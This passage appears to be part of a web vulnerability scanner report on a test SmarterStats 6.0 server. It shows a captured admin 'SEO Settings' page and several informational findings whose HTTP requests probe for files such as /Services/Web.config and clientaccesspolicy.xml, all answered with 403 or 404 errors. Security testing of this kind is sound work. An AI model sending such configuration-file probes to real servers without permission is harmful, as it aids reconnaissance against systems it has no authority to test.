<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTIwMjc0MzU0DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8DaGQCBw9kFgJmD2QWAgIBDxYCHwNoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAg9kFgQCAQ8WAh8DaGQCBQ9kFgJmD2QWAgIBD2QWAmYPEA8WCh4NRGF0YVRleHRGaWVsZAUEbmFtZR4ORGF0YVZhbHVlRmllbGQFAmlkHgtfIURhdGFCb3VuZGceCENzc0NsYXNzBQxDaGVja2JveExpc3QeBF8hU0ICAmQQFRYGR29vZ2xlBVlhaG9vA0FzawRCaW5nC0dvb2dsZSAoQVUpC0dvb2dsZSAoQlIpC0dvb2dsZSAoQ0EpC0dvb2dsZSAoQ04pC0dvb2dsZSAoREUpC0dvb2dsZSAoRVMpC0dvb2dsZSAoRlIpC0dvb2dsZSAoSEspC0dvb2dsZSAoSU4pC0dvb2dsZSAoSUwpC0dvb2dsZSAoSVQpC0dvb2dsZSAoSlApC0dvb2dsZSAoS1IpC0dvb2dsZSAoTVgpC0dvb2dsZSAoTkwpC0dvb2dsZSAoVFcpC0dvb2dsZSAoUlUpC0dvb2dsZSAoVUspFRYBMQEyATQBNQE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyNAIyMxQrAxZnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBA9kFgICAQ9kFgRmD2QWAgIBD2QWAgICDw8WAh8EBQNOL0FkZAIBD2QWAgIBD2QWAmYPEGQQFQAVABQrAwAWAGQYAwUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFhcFKmN0bDAwJE1QSCRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMAUqY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxBSpjdGwwMCRNUEgkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIFKmN0bDAwJE1QSCRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMwUqY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ0BSpjdGwwMCRNUEgkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDUFKmN0bDAwJE1QSCRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNgUqY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ3BSpjdGwwMCRNUEgkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDgFKmN0bDAwJE1QSCRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMAUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMgUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMwUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNAUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNgUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNwUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOAUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMAUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTEPMtsLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAA1AV2ViSW50ZXJmYWNlAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y4gsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAADkBTZWFyY2hFbmdpbmVzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAQU2VhcmNoRW5naW5lc1RhYgtk7P9cHbJRho/eZ6ho5ilLiM/VKcLb3S+SDDOyAjIcleQ=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$TPH$UpdatePanel3','','tctl00$MPH$UpdatePanel5',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       SEO Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   <div id="ctl00_BPH_btnRetrieve" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ShowReprocessPopup();; return false;"><span class="BBInner">Reprocess SEO</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   <div id="ctl00_TPH_UpdatePanel3">
   
           
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Search Engines</span></span></a></li>
       <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Web Interface</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem2" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
       
</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel5">
   
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_SearchEnginesTab" />
               <div id='ctl00_MPH_SearchEnginesTab' class='' >
           <span id="ctl00_MPH_SearchEnginesTab">
                   
                   
                   <table id="ctl00_MPH_tblSeoSearchEngines" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_chklistEngines">
                   <td id="ctl00_MPH_chklistEngines_Setting" class="Indent Setting"><table id="ctl00_MPH_chklistEngines_SettingCheckBox" class="CheckboxList" border="0">
                       <tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_0" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$0" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_0">Google</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_8" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$8" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_8">Google (DE)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_15" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$15" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_15">Google (JP)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_1" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$1" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_1">Yahoo</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_9" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$9" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_9">Google (ES)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_16" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$16" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_16">Google (KR)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_2" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$2" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_2">Ask</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_10" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$10" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_10">Google (FR)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_17" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$17" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_17">Google (MX)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_3" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$3" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_3">Bing</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_11" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$11" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_11">Google (HK)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_18" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$18" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_18">Google (NL)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_4" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$4" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_4">Google (AU)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_12" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$12" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_12">Google (IN)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_19" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$19" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_19">Google (TW)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_5" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$5" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_5">Google (BR)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_13" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$13" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_13">Google (IL)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_20" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$20" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_20">Google (RU)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_6" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$6" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_6">Google (CA)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_14" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$14" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_14">Google (IT)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_21" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$21" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_21">Google (UK)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_7" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$7" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_7">Google (CN)</label></td><td></td><td></td>
                       </tr>
                   </table></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_OptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_OptionsTab">
                   <table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtNoSearchEngines">
                   <td id="ctl00_MPH_txtNoSearchEngines_Label" class="Indent Fixed">Engine for Overviews</td><td id="ctl00_MPH_txtNoSearchEngines_Setting" class="Setting"><span id="ctl00_MPH_txtNoSearchEngines_ReadOnlyLabel">N/A</span></td>
               </tr>
           </table>
               </span></div>
       
           </div>
   
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmseosettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function ShowReprocessPopup() {
           SpawnHyperWindow("/Client/Popups/frmRetrieveSEO.aspx", 320, 200, null);
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { SetTopTitle('SEO\x20Settings'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_SearchEnginesTab","ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


11.9. http://vulnerable.smarterstats.6.0.host:9999/Services/Web.config  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/Web.config

Request

GET /Services/Web.config HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:11:05 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.10. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/4_0_30319/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /aspnet_client/system_web/4_0_30319/

Request

GET /aspnet_client/system_web/4_0_30319/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 404 Not Found
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:12:37 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Not Found</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 404 - Not Found.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.11. http://vulnerable.smarterstats.6.0.host:9999/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /clientaccesspolicy.xml

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:12:46 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

